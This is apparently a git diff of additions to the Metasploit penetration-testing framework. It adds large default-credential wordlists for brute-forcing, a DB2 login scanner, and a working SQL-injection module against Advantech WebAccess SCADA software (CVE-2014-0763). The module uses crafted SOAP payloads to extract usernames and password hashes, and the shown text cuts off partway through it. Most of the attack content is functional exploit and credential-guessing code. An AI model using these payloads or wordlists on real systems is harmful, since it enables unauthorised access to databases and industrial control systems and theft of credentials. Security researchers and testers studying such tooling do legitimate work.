+CHEY_ARCHSVR +SYS ORACLE +roo honey +n.a guardone +accounting accounting +backuprestore backuprestore1 +PRINT PRINT + j322 + Craftr4 +dni dni +WEBADM password +iceman +guru *3noguru +FAX FAX +anon anon + j256 +USER8 USER8 +root honey +PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC + 589721 +postgres +WINSABRE WINSABRE +USERP USERP +none public +Admin shs +SYS MANAGER +IVPM2 +PORTAL30_SSO PORTAL30_SSO +ALLIN1MAIL ALLIN1MAIL +POST +TEMP + xo11nE +admin nms +SYSADM SYSADM +BATCH1 +me me +SUPERVISOR NFI +PROMAIL +SECDEMO SECDEMO +ARAdmin AR#Admin# +sadmin +ORAREGSYS ORAREGSYS +VMASSYS +man +FROSTY SNOWMAN +LASER LASER +tutor + ?award +root changethis +DISKCNT +default WLAN_AP +SYSERR +WWW WWW +VAX VAX +none none + Cable-docsis +PROCAL +SUPERVISOR SYSTEM +FAXWORKS +ibm password +CTXSYS UNKNOWN +LDAP_Anonymous LdapPassword_1 +(any 3 chars) cascade +games +User 1234 + Zenith +setup/snmp setup/nopasswd +DSGATEWAY DSGATEWAY +AWARD_SW +CSMIG CSMIG + year2000 +umountfsys umountfsys + BIGO +root jstwo +VMS VMS +dni +bpel bpel +viewuser viewuser1 +admin ISPMODE +TDISK +politically correct +user_analyst demo +admin conexant +guest 1234 +root logapp +admin ip3000 +RSCS +COMPIERE COMPIERE +OSP22 OSP22 +guest1 guest1 +FORSE FORSE + lesarotl +factory factory +bubba (unknown) +admin ip20 +admin ip21 +LASER +QUSER QUSER + AWARD SW +primeos prime +admin tr650 +poll poll + j262 + xljlbj +glftpd glftpd + Advance +RMAN RMAN +mountfs mountfs +DIRECT + console +firstsite firstsite + SW_AWARD +IPFSERV + snake +Administrator Gateway +TSUSER TSUSER +BATCH2 +admin 123123 + 3098z + cc +snmp nopasswd +WebAdmin WebBoard +IBMUSER SYS1 +SMART +voadmin manager +BC4J BC4J +core phpreactor +OPERVAX OPERVAX +Bobo hello + Congress + central +WANGTEK WANGTEK +disttech etas +OWA OWA +USER2 USER2 +jasperadmin jasperadmin +FIELD DIGITAL +root uClinux +guest guestgue +FAXUSER FAXUSER +WINSABRE SABRE +VMBSYSAD +admin ip400 +PVM +ctb_admin sap123 + AMI.KEY + AMI.KEZ +  ANYCOM +USER_TEMPLATE +DEMO4 + inuvik49 +QSRV 11111111 +qsrv qsrv +superdba admin +PORTAL30 PORTAL31 +PORTAL30 PORTAL30 +XPRT XPRT +Crowd password +User 19750407 +18364 + zjaaadc +ilom-admin ilom-admin +rdc123 rdc123 +sysopr sysopr +tasman tasmannet +SYSTEM 0RACLE8I + Cisco router +admin store + SER +blank blank +ADMIN PASSWORD +admin IP address +WEBREAD WEBREAD +ODM ODM +11111111 11111111 +prime prime +AURORA$ORB$UNAUTHENTICATED INVALID +ADAMS WOOD +root vertex25 +sys bin +lp lineprin +Craft crftpw +www www +postgres dbpass +rfmngr $rfmngr$ +sync sync +WANGTEK + 1988 +MAINT +SYSTEST_CLIG SYSTEST +user user0000 +user_approver demo +ilom-operator ilom-operator +Nice-admin nicecti + HELGA-S +answer +NETNONPRIV NETNONPRIV +nuucp +CIDS CIDS +VASTEST +primenet primenet +redline redline + rw +spcl 0000 +admin muze +MBMANAGER MBMANAGER +webmaster +APPLSYS FND + ro +WINDOWS_PASSTHRU WINDOWS_PASSTHRU +USER4 USER4 +hqadmin hqadmin +UOMNI_ +FIELD TEST +sys system +Admin 123qwe +VMUTIL +POST BASE + dn_04rjc +uucpadm uucpadm +halt +FAXWORKS FAXWORKS +admin password1 +EXFSYS EXFSYS +4Dgifts +JMUSER JMUSER +admin imsa7.0 +SUPERVISOR NETFRAME +CIS CIS +UNITY_ + ciscofw +HLW HLW +admin brocade1 +pwrchute pwrchute + setup + Tiny +IDMSSE +postgres svcPASS83 +NSA nsa +!root !ishtar +admin blank +root NeXT +TELEDEMO TELEDEMO + AMIDECOD +recover recover +TRAVEL TRAVEL +lexar + efmukl +viewer +LIBRARY +admin raritan +PO8 PO8 +root@localhost root +NAMES NAMES +secofr secofr +PDMREMI + biostar +MGE VESOFT +USER7 USER7 +OWA_PUBLIC OWA_PUBLIC +questra questra +builtin builtin +SFCNTRL +SAP* 6071992 +boss boss +anonymous password + isolation + Q54arwms +PLEX PLEX +OLAPDBA OLAPDBA + g6PJ +OLAPSVR INSTANCE +user_expert demo +root pixmet2003 +Bhosda Lund +TEST +qsvr ibmcel +CMSBATCH CMSBATCH + ABCD +gropher + AM +administrator admin + condo + Toshiba + familymacintosh +TAHITI TAHITI +NEWINGRES NEWINGRES + AMI?SW + mMmM +man man +VM3812 +root powerapp +ibm service +VIF_DEVELOPER VIF_DEV_PWD +ADMIN WELCOME +Admin Barricade +joeuser joeuser +system isp +IPC +HELPDESK HELPDESK +wlpisystem wlpisystem +TSAFVM +prtgadmin prtgadmin +SYSTEM CHANGE_ON_INSTALL + CONCAT + t0ch88 +webmaster webmaster + djonet +ADMIN changeme +Any + Compaq +UAMIS_ +theman changeit +CISINFO CISINFO +mobile dottie +QS_CB QS_CB +CDEMORID CDEMORID +tech nician +DEMO2 +administrator none +SYS MANAG3R +End User 7936 +PORTAL30_PUBLIC PORTAL30_PUBLIC +sysadmin nortel +SYS D_SYSTPW +SYSTEM SYSPASS +Guest blank +User User +MDDEMO_CLERK CLERK +FIELD FIELD +Admin SECRET123 +Guest Guest +PHANTOM +admin amigosw1 + xmux +write +ADMINISTRATOR SENTINEL +system field + ducati900ss +qsecofr 22222222 + lkw peter + awkward + TzqF +SYSTEST_CLIG SYSTEST_CLIG +ODS ODS +admin axis2 +BLAKE PAPER +TSDEV TSDEV +PRODBM +admin letmein + joh316 +dos dos +login 0000 +APL2PP +system hdms +admin phplist +god1 12345 +admin novell +CICSUSER CISSUS +22222222 22222222 +root passw0rd +user_publisher demo +OSE$HTTP$ADMIN (random password) +def trade +SuperUser kronites +QS_CBADM QS_CBADM +SYSA SYSA + 00000000 +STUDENT STUDENT +Draytek 1234 +SMDR SECONDARY +EREP +VSEMAN + OOOOOOOO +primos_cs prime +demo +fwadmin xceladmin + j64 +MTS_USER MTS_PASSWORD + AWARD_SW +AQDEMO AQDEMO +private ReadWrite access secret + GWrv + MagiMFP + SnuFG5 +IS_$hostname IS_$hostname +HPSupport badg3r5 +ORASSO ORASSO +GATEWAY + t0ch20x +CVIEW +SH SH + zeosx +XXSESS_MGRYY X#1833 + wodj + FOOBAR +SYSMAN SYSMAN +VMMAP +admin urchin +PORTAL30_DEMO PORTAL30_DEMO +Ezsetup +QS_CS QS_CS +administrator PlsChgMe! +CMSUSER + MCUrv +DEMO1 +admin adminadmin +userNotUsed userNotU + AMI~ +root ibm +ncadmin ncadmin +TESTPILOT TESTPILOT + Polrty +fg_sysadmin password +UETP UETP +QS QS +DBI MUMBLEFRATZ +  ILMI +SYSTEM SYS +JWARD AIROPLANE +APPS_MRC APPS_MRC + uboot +Moe hello +SENTINEL SENTINEL +admin netgear1 +Yak asd123 +PDP11 PDP11 + aammii +Flo hello +SLIDE SLIDEPW +root bagabu +primeos primeos + Spacve + 256256 +INFO INFO +checkfsys checkfsys +PRODCICS PRODCICS + foolproof + AWARD_PW +MXAGENT MXAGENT +SYSTEM ORACLE8I +admin no password +VMTLIBR +POWERCARTUSER POWERCARTUSER +VMBACKUP +CPNUC + QDI + shiva +distrib distrib0 +SUPERVISOR SUPERVISOR +SYSMAINT SERVICE +MIGRATE MIGRATE +CDEMOUCB CDEMOUCB +system prime +QSRV 22222222 + c +OLTSEP +sysbin sysbin +signa signa +autocad autocad + SWITCHES_SW +WEBDB WEBDB +daemon + aPAf +ncrm ncrm +SAMPLE SAMPLE + 1 +HCPARK HCPARK +ALLINONE ALLINONE +nm2user nm2user +SAVSYS +IIPS +PATROL PATROL + technolgi + MBIU0 +mailadmin secret +adm adm +TMSADM +tutor tutor +ESubscriber +CHEY_ARCHSVR CHEY_ARCHSVR +write synnet +software software +admin welcome +god2 12345 +bbs bbs + Dell +disttech disttech +FSFTASK2 + zbaaaca + prost +ORDSYS ORDSYS +Administrator administrator + 1234567890 +gopher gopher +PSFMAINT +SYSTEM MANAG3R + RM + s!a@m#n$p%c +EAdmin +12345 12345 +DECNET DECNET +OPERATIONS OPERATIONS +$system +REP_OWNER DEMO +PANAMA PANAMA +LIBRARIAN SHELVES +SYSTEM 0RACLE +fal +4Dgifts 4Dgifts + biosstar +NETSERVER NETSERVER + tiny +root TANDBERG +POWERCHUTE APC +USER5 USER5 +GPFD GPFD + 12345678 +blank admin +QS_OS QS_OS +sysadm admin +REPADMIN REPADMIN +Administrator 12345678 +0 0 +DEMO8 DEMO8 +DEMO9 DEMO9 +CDEMO82 CDEMO82 +admin boca raton +Administrator vision2 +administrator 0 +umountsys umountsys +snmp snmp +Username PASSWORD +volition +USER0 USER0 +CDEMOCOR CDEMOCOR +SYSTEST UETP +Rodopi Rodopi +DECNET NONPRIV +user_checker demo + tatercounter2000 +qserv qserv + ESSEX or IPC +AQ AQ +support +SAPR3 SAP +VRR1 VRR1 +fastwire fw +admi admin +FINANCE FINANCE +WinCCAdmin 2WSXcder +ESTOREUSER ESTORE +fax fax +VIRUSER VIRUSER +LINK LINK +APPLSYSPUB FNDPUB + BIOS +SYS ORACLE8 +SYS ORACLE9 +overseer overseer +checksys checksys +umountfs umountfs +DBDCCICS DBDCCIC +Admin password + x6zynd56 +TOAD TOAD +root mozart +ntpupdate ntpupdate +root router +MDDEMO_MGR MGR +ARCHIVIST +SUPERVISOR HARRIS + 11111 +billy-bob +lp bin +DECMAIL DECMAIL +alien alien +admin dnnadmin +nsroot nsroot +AdvWebadmin advcomm500349 +dvstation dvst10n +SERVICECONSUMER1 SERVICECONSUMER1 +MMO2 MMO2 +qsecofr 11111111 +NOC NOC +WWWUSER WWWUSER +root Serial port only +SAP SAPR3 +root t0talc0ntr0l4! +NEVIEW +MAIL +ODSCOMMON ODSCOMMON +fal fal +pixadmin pixadmin +ripeop +PENG + BIOSPASS +netlink netlink +L2LDEMO L2LDEMO +OUTLN OUTLN +12.x +scott tiger or tigger + toshy99 +dbase dbase + nz0u4bbe +fam fam + bell9 +Oper Oper +RMAIL RMAIL +administrator 19750407 +FND FND +admin exinda +PRIV PRIV +admin barney +SETUP + biodata + 24Banc81 +news news +VSEIPO + j09F +pw pw +GUEST +ilon ilon + award_? +SYS 0RACLE39 +SYS 0RACLE38 +DEFAULT DEFAULT + AMI!SW +PLSQL SUPERSECRET +root alpine +politcally correct +18140815 18140815 +APPUSER APPUSER +SUPERVISOR +CENTRA CENTRA +LBACSYS LBACSYS + alfarome +PDP8 PDP8 +SFCMI +administrator * * # +lpadm lpadm +Test Everything +bewan bewan + 2580 +DIP DIP + Sxyz +mfd mfd +MDDEMO MDDEMO + intermec + 589589 +SWPRO SWPRO +DES DES +root fibranne +Coco hello +GCS +rodopi rodopi + touchpwd= +Scott Tiger +Admin5 4tugboat +admin funkwerk +ANDY SWORDFISH +DESQUETOP +nobody +Manager 657 + mysweex +SYSTEM SYSLIB +NETCON NETCON +JONES STEEL +author author +MOESERV +web web +tech User +PUBSUB1 PUBSUB1 +SYS D_SYSPW +CATALOG CATALOG + IBM + Guest +SQLUSER +RE RE +REPORTS_USER OEM_TEMP +MFG MFG +POST POST +HPLASER HPLASER +HR HR +VIDEOUSER VIDEO USER +DBA SQL + CMOSPWD +guest1 guest +superuser asante +SYSTEM 0RACLE38 +SYSTEM 0RACLE39 +AUTOLOG1 +dadmin dadmin +AURORA$JIS$UTILITY$ +wlcsystem wlcsystem +news +CPRM diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt new file mode 100644 index 0000000000..c36f0e7e2b --- /dev/null +++ b/data/wordlists/default_users_for_services_unhash.txt @@ -0,0 +1,915 @@ +admin + +root +Administrator +sysadm +tech +operator +guest +security +debug +manager +service +!root +user +netman +super +diag +Cisco +Manager +DTA +apc +User +Admin +cablecom +adm +wradmin +netscreen +sa +setup +cmaker +enable +MICRO +login +write +monitor +netopia +op +adminview +sysadmin +echo +craft +maint +comcast +CSG +readonly +manuf +cusadmin +smc +sweex +disttech +su +poll +SYSDBA +anonymous +support +recovery +USERID +eng +administrator +NETWORK +JDE +Guest +rwa +USER +test +lp +ro +MAIL +ami +hsa +system +MGR +ADMINISTRATOR +FIELD +PBX +HELLO +hscroot +1502 +superuser +netrangr +readwrite +piranha +wlse +l3 +none +naadmin +public +NETOP +MANAGER +demo +D-Link +l2 +rw +cgadmin +storwatch +vcr +OPERATOR +MDaemon +jagadmin +enquiry +at4400 +davox +PFCUser +aaa +topicalt +admin2 +1234 +nms +client +sys +field +deskman +SYSADM +superadmin +pmd +GEN2 +ADMN +Factory +PRODDTA +tellabs +spcl +dadmin +helpdesk +dhs3mt +install +adfexc +IntraSwitch +manage +superman +SPOOLMAN +ADVMAIL +vt100 +PSEAdmin +patrol +teacher +PCUSER +Any +RSBCMON +cellit +inads +halt +locate +TMAR#HWMT8007079 +rapport +xbox +device +NICONEX +acc +31994 +bcim +websecadm +blue +topicnorm +supervisor +ccrusr +266344 +telecom +GEN1 +SSA +HTTP +mtch +bciim +browse +hydrasna +deskres +bbsd-client +replicator +intel +radware +intermec +mlusr +init +e250 +Polycom +temp1 +mac +3comcso +RMUser1 +WP +NAU +rcust +mtcl +topicres +bcnas +adminuser +Root +cac_admin +mediator +Anonymous +kermit +volition +GlobalAdmin +LUCENT01 +LUCENT02 +adminstat +desknorm +IntraStack +e500 +deskalt +cust +tiara +bcms +m1122 +telco +xd +dhs3pms +VNC +customer +cisco +adminstrator +ftp_nmc +me +iclock +scmadmin +installer +webadmin +ftp_inst +DDIC +SYSTEM +draytek +EARLYWATCH +super.super +ftp_oper +corecess +weblogic +system/manager +End +d.e.b.u.g +target +MD110 +tiger +adminttd +wlseuser +SAPCPIC +ftp_admi +default.password +7 +2 +ADMIN +itsadmin +PUBSUB +CTXSYS +ftp +bill +192.168.1.1 +setpriv +GUEST +SAP* +t3admin +hello +CISCO15 +1.79 +mso +Telecom +qsysopr +APPS +Developer +mail +qsecofr +11111 +Service +netadmin +any +db2fenc1 +johnson +isp +demos +QSRV +MDSYS +vpasp +TEST +QSECOFR +1 +informix +5 +engmode +scout +qpgmr +ADSL +images +Gearguy +Demo +serial# +BACKUP +stratacom +6.x +mary +COMPANY +SYS +DSL +Jetform +eagle +ROUTER +ods +siteadmin +Alphanetworks +Admin1 +janta +servlet +username +citel +Replicator +SYSMAN +master +SUPERUSER +cn=orcladmin +30 +maintainer +BRIO_ADMIN +internal +CQSCHEMAUSER +DEV2000_DEMOS +FSFTASK1 +checkfs +USER1 +SQLDBA +HELP +toor +qsrvbas +SYSADMIN +EZsetup +BATCH +STRAT_USER +primenet +OEMREP +USER6 +lynx +powerdown +$ALOC$ +password +VOL-0215 +tomcat +REP_MANAGER +WinCCConnect +ALLIN1 +DIRMAINT +eqadmin +QSRVBAS +AQJAVA +LASERWRITER +PERFSTAT +apcuser +MBWATCH +system_admin +unix +OWNER +NETPRIV +VSEMAINT +DEMO +SYMPA +REP_OWNER +DCL +FAX +ARCHIVIST +VTAMUSER +VMTAPE +basisk +NetLinx +OutOfBox +NETMGR +DEFAULT +OAS_PUBLIC +read +AP +MTSSYS +SYSMAINT +AUDIOUSER +Joe +IDMS +$SRV +snake +ROOT +PRINTER +shutdown +satan +RDM470 +trouble +fax +OP1 +admin@example.com +HOST +ADLDEMO +QS_ADM +bin +OPER +oracle +jj +PO7 +www +joe +MAINT +CMSBATCH +CCC +role1 +DATAMOVE +MSHOME +ISPVM +crowd­-openid-­server +user_editor +sedacm +db2admin +Airaya +SYSDUMP1 +IMEDIA +primos_cs +USER_TEMPLATE +pnadmin +lpadmin +VTAM +TRACESVR +POSTMASTER +MAILER +RSCSV2 +QS_WS +circ +nobody +Tasman +DISCOVERER_ADMIN +VMASMON +LR-ISDN +TURBINE +GL +PO +PRINT +MODTEST +GATEWAY +PRIMARY +both +haasadm +pw +games +DOCSIS_APP +bbs +EMP +postmaster +SITEMINDER +vgnadmin +RJE +gonzo +NEWS +AQUSER +UTLBSTATU +netbotz +xmi_demo +ORACACHE +MCUser +prash +sync +PM +AP2SVP +ibm +ULTIMATE +SABRE +user_pricer +SUPERVISOR +EVENT +PORTAL30_SSO_PS +FSFADMIN +OO +WKSYS +OPERATNS +UVPIM_ +OE +OCITEST +web +ESSEX +None +CTXDEMO +user_designer +QDBA +role +LRISDN +tele +WEBCAL01 +rsadmin +OMWB_EMULATION +WINDOWS_PASSTHRU +MOREAU +fast +host +ORDPLUGINS +SYSWRM +savelogs +SDOS_ICSAP +DSSYS +MGWUSER +TDOS_ICSAP +ssp +EJSADMIN +INGRES +DS +estheralastruey +VCSRV +ssladmin +CLARK +OEMADM +restoreonly +quser +MILLER +trmcnfg +REPORT +user_author +dpn +tour +mountfsys +http +PROG +openfiler +RAID +STARTER +FAXUSER +DSA +daemon +mountsys +backuponly +IVPM1 +USER3 +OPENSPIRIT +prime +HPLASER +CSPUSER +qsvr +SYSCKP +Sysop +user_marketer +IMAGEUSER +bsxuser +MASTER +USER9 +OLAPSYS +rje +ODM_MTR +QS_ES +lansweeperuser +DEMO3 +Username +GPLD +uucp +DBSNMP +VMARCH +SWUSER +Operator +CHEY_ARCHSVR +roo +n.a +accounting +backuprestore +dni +WEBADM +iceman +guru +anon +USER8 +PORTAL30_SSO_PUBLIC +postgres +WINSABRE +USERP +IVPM2 +PORTAL30_SSO +ALLIN1MAIL +POST +TEMP +BATCH1 +PROMAIL +SECDEMO +ARAdmin +sadmin +ORAREGSYS +VMASSYS +man +FROSTY +LASER +tutor +DISKCNT +default +SYSERR +WWW +VAX +PROCAL +FAXWORKS +LDAP_Anonymous +(any +setup/snmp +DSGATEWAY +AWARD_SW +CSMIG +umountfsys +VMS +bpel +viewuser +TDISK +politically +user_analyst +RSCS +COMPIERE +OSP22 +guest1 +FORSE +factory +bubba +QUSER +primeos +glftpd +RMAN +mountfs +DIRECT +firstsite +IPFSERV +TSUSER +BATCH2 +snmp +WebAdmin +IBMUSER +SMART +voadmin +BC4J +core +OPERVAX +Bobo +WANGTEK +OWA +USER2 +jasperadmin +VMBSYSAD +PVM +ctb_admin +  +DEMO4 +qsrv +superdba +PORTAL30 +XPRT +Crowd +18364 +ilom-admin +rdc123 +sysopr +tasman +blank +WEBREAD +ODM +11111111 +AURORA$ORB$UNAUTHENTICATED +ADAMS +Craft +rfmngr +SYSTEST_CLIG +user_approver +ilom-operator +Nice-admin +answer +NETNONPRIV +nuucp +CIDS +VASTEST +redline +MBMANAGER +webmaster +APPLSYS +USER4 +hqadmin +UOMNI_ +VMUTIL +uucpadm +EXFSYS +4Dgifts +JMUSER +CIS +UNITY_ +HLW +pwrchute +IDMSSE +NSA +TELEDEMO +recover +TRAVEL +lexar +viewer +LIBRARY +PO8 +root@localhost +NAMES +secofr +PDMREMI +MGE +USER7 +OWA_PUBLIC +questra +builtin +SFCNTRL +boss +PLEX +OLAPDBA +OLAPSVR +user_expert +Bhosda +gropher +TAHITI +NEWINGRES +VM3812 +VIF_DEVELOPER +joeuser +IPC +HELPDESK +wlpisystem +TSAFVM +prtgadmin +UAMIS_ +theman +CISINFO +mobile +QS_CB +CDEMORID +DEMO2 +PORTAL30_PUBLIC +MDDEMO_CLERK +PHANTOM +ODS +BLAKE +TSDEV +PRODBM +dos +APL2PP +god1 +CICSUSER +22222222 +user_publisher +OSE$HTTP$ADMIN +def +SuperUser +QS_CBADM +SYSA +STUDENT +Draytek +SMDR +EREP +VSEMAN +fwadmin +MTS_USER +AQDEMO +private +IS_$hostname +HPSupport +ORASSO +CVIEW +SH +XXSESS_MGRYY +VMMAP +PORTAL30_DEMO +Ezsetup +QS_CS +CMSUSER +DEMO1 +userNotUsed +ncadmin +TESTPILOT +fg_sysadmin +UETP +QS +DBI +JWARD +APPS_MRC +Moe +SENTINEL +Yak +PDP11 +Flo +SLIDE +INFO +checkfsys +PRODCICS +MXAGENT +VMTLIBR +POWERCARTUSER +VMBACKUP +CPNUC +distrib +MIGRATE +CDEMOUCB +OLTSEP +sysbin +signa +autocad +WEBDB +ncrm +SAMPLE +HCPARK +ALLINONE +nm2user +SAVSYS +IIPS +PATROL +mailadmin +TMSADM +ESubscriber +software +god2 +FSFTASK2 +ORDSYS +gopher +PSFMAINT +EAdmin +12345 +DECNET +OPERATIONS +$system +PANAMA +LIBRARIAN +fal +NETSERVER +POWERCHUTE +USER5 +GPFD +QS_OS +REPADMIN +0 +DEMO8 +DEMO9 +CDEMO82 +umountsys +USER0 +CDEMOCOR +SYSTEST +Rodopi +user_checker +qserv +AQ +SAPR3 +VRR1 +fastwire +admi +FINANCE +WinCCAdmin +ESTOREUSER +VIRUSER +LINK +APPLSYSPUB +overseer +checksys +umountfs +DBDCCICS +TOAD +ntpupdate +MDDEMO_MGR +billy-bob +DECMAIL +alien +nsroot +AdvWebadmin +dvstation +SERVICECONSUMER1 +MMO2 +NOC +WWWUSER +SAP +NEVIEW +ODSCOMMON +pixadmin +ripeop +PENG +netlink +L2LDEMO +OUTLN +12.x +scott +dbase +fam +Oper +RMAIL +FND +PRIV +SETUP +news +VSEIPO +ilon +PLSQL +politcally +18140815 +APPUSER +CENTRA +LBACSYS +PDP8 +SFCMI +lpadm +Test +bewan +DIP +mfd +MDDEMO +SWPRO +DES +Coco +GCS +rodopi +Scott +Admin5 +ANDY +DESQUETOP +NETCON +JONES +author +MOESERV +PUBSUB1 +CATALOG +SQLUSER +RE +REPORTS_USER +MFG +HR +VIDEOUSER +DBA +AUTOLOG1 +AURORA$JIS$UTILITY$ +wlcsystem +CPRM diff --git a/lib/metasploit/framework/login_scanner/db2.rb b/lib/metasploit/framework/login_scanner/db2.rb new file mode 100644 index 0000000000..cfc17c4652 --- /dev/null +++ b/lib/metasploit/framework/login_scanner/db2.rb @@ -0,0 +1,123 @@ +require 'metasploit/framework/tcp/client' +require 'metasploit/framework/login_scanner/base' +require 'metasploit/framework/login_scanner/rex_socket' + +module Metasploit + module Framework + module LoginScanner + # This is the LoginScanner class for dealing with DB2 Database servers. + # It is responsible for taking a single target, and a list of credentials + # and attempting them. It then saves the results. + class DB2 + include Metasploit::Framework::LoginScanner::Base + include Metasploit::Framework::LoginScanner::RexSocket + include Metasploit::Framework::Tcp::Client + + # @see Base#attempt_login + def attempt_login(credential) + result_options = { + credential: credential + } + + begin + probe_data = send_probe(credential.realm) + + if probe_data.empty? + result_options[:status] = :connection_error + else + if authenticate?(credential) + result_options[:status] = :success + else + result_options[:status] = :failed + end + end + rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout, ::Rex::Proto::DRDA::RespError,::Timeout::Error => e + result_options.merge!({ + status: :connection_error, + proof: e.message + }) + end + + ::Metasploit::Framework::LoginScanner::Result.new(result_options) + end + + private + # This method takes the credential and actually attempts the authentication + # @param credential [Credential] The Credential object to authenticate with. + # @return [Boolean] Whether the authentication was successful + def authenticate?(credential) + # Send the login packet and get a response packet back + login_packet = Rex::Proto::DRDA::Utils.client_auth(:dbname => credential.realm, + :dbuser => credential.public, + :dbpass => credential.private + ) + sock.put login_packet + response = sock.get_once + if valid_response?(response) + if successful_login?(response) + true + else + false + end + else + false + end + end + + # This method opens a socket to the target DB2 server. + # It then sends a client probe on that socket to get information + # back on the server. + # @param database_name [String] The name of the database to probe + # @return [Hash] A hash containing the server information from the probe reply + def send_probe(database_name) + disconnect if self.sock + connect + + probe_packet = Rex::Proto::DRDA::Utils.client_probe(database_name) + sock.put probe_packet + response = sock.get_once + + response_data = {} + if valid_response?(response) + packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response) + response_data = Rex::Proto::DRDA::Utils.server_packet_info(packet) + end + response_data + end + + # This method sets the sane defaults for things + # like timeouts and TCP evasion options + def set_sane_defaults + self.max_send_size ||= 0 + self.send_delay ||= 0 + self.ssl ||= false + end + + # This method takes a response packet and checks to see + # if the authentication was actually successful. + # + # @param response [String] The unprocessed response packet + # @return [Boolean] Whether the authentication was successful + def successful_login?(response) + packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response) + packet_info = Rex::Proto::DRDA::Utils.server_packet_info(packet) + if packet_info[:db_login_success] + true + else + false + end + end + + # This method provides a simple test on whether the response + # packet was valid. + # + # @param response [String] The response to examine from the socket + # @return [Boolean] Whether the response is valid + def valid_response?(response) + response && response.length > 0 + end + end + + end + end +end \ No newline at end of file diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index d29e677839..b8efa19929 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -480,7 +480,7 @@ class Client opts['headers']||= {} ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+6) domain_name = self.config['domain'] b64_blob = Rex::Text::encode_base64( diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb new file mode 100644 index 0000000000..f22cfe9fa2 --- /dev/null +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -0,0 +1,299 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include REXML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Advantech WebAccess SQL Injection', + 'Description' => %q{ + This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The + vulnerability exists in the DBVisitor.dll component, and can be abused through malicious + requests to the ChartThemeConfig web service. This module can be used to extract the site + and project usernames and hashes. + }, + 'References' => + [ + [ 'CVE', '2014-0763' ], + [ 'ZDI', '14-077' ], + [ 'OSVDB', '105572' ], + [ 'BID', '66740' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03' ] + ], + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Apr 08 2014" + )) + + register_options( + [ + OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']), + OptString.new("WEB_DATABASE", [true, 'The path to the bwCfg.mdb database in the target', "C:\\WebAccess\\Node\\config\\bwCfg.mdb"]) + ], self.class) + end + + def build_soap(injection) + xml = Document.new + xml.add_element( + "s:Envelope", + { + 'xmlns:s' => "http://schemas.xmlsoap.org/soap/envelope/" + }) + xml.root.add_element("s:Body") + body = xml.root.elements[1] + body.add_element( + "GetThemeNameList", + { + 'xmlns' => "http://tempuri.org/" + }) + name_list = body.elements[1] + name_list.add_element("userName") + name_list.elements['userName'].text = injection + + xml.to_s + end + + def do_sqli(injection, mark) + xml = build_soap(injection) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path.to_s, "Services", "ChartThemeConfig.svc"), + 'ctype' => 'text/xml; charset=UTF-8', + 'headers' => { + 'SOAPAction' => '"http://tempuri.org/IChartThemeConfig/GetThemeNameList"' + }, + 'data' => xml + }) + + unless res && res.code == 200 && res.body && res.body.include?(mark) + return nil + end + + res.body.to_s + end + + def check + mark = Rex::Text.rand_text_alpha(8 + rand(5)) + injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " + injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" + data = do_sqli(injection, mark) + + if data.nil? + return Msf::Exploit::CheckCode::Safe + end + + Msf::Exploit::CheckCode::Vulnerable + end + + def parse_users(xml, mark, separator) + doc = Document.new(xml) + + strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text) + strings_length = strings.length + + unless strings_length > 1 + return + end + + i = 0 + strings.each do |result| + next if result == mark + @users << result.split(separator) + i = i + 1 + end + + end + + def run + print_status("#{peer} - Exploiting sqli to extract users information...") + mark = Rex::Text.rand_text_alpha(8 + rand(5)) + rand = Rex::Text.rand_text_numeric(2) + separator = Rex::Text.rand_text_alpha(5 + rand(5)) + # While installing I can only configure an Access backend, but + # according to documentation other backends are supported. This + # injection should be compatible, hopefully, with most backends. + injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}BAUser' from BAUser where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pUserPassword' from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pAdmin' from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" + data = do_sqli(injection, mark) + + if data.blank? + print_error("#{peer} - Error exploiting sqli") + return + end + + @users = [] + @plain_passwords = [] + + print_status("#{peer} - Parsing extracted data...") + parse_users(data, mark, separator) + + if @users.empty? + print_error("#{peer} - Users not found") + return + else + print_good("#{peer} - #{@users.length} users found!") + end + + users_table = Rex::Ui::Text::Table.new( + 'Header' => 'Advantech WebAccess Users', + 'Ident' => 1, + 'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password', 'Origin'] + ) + + for i in 0..@users.length - 